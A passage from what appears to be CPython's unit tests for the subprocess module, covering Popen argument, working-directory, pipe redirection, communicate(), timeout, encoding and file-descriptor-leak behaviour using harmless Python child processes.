# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises((FileNotFoundError, PermissionError),
self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
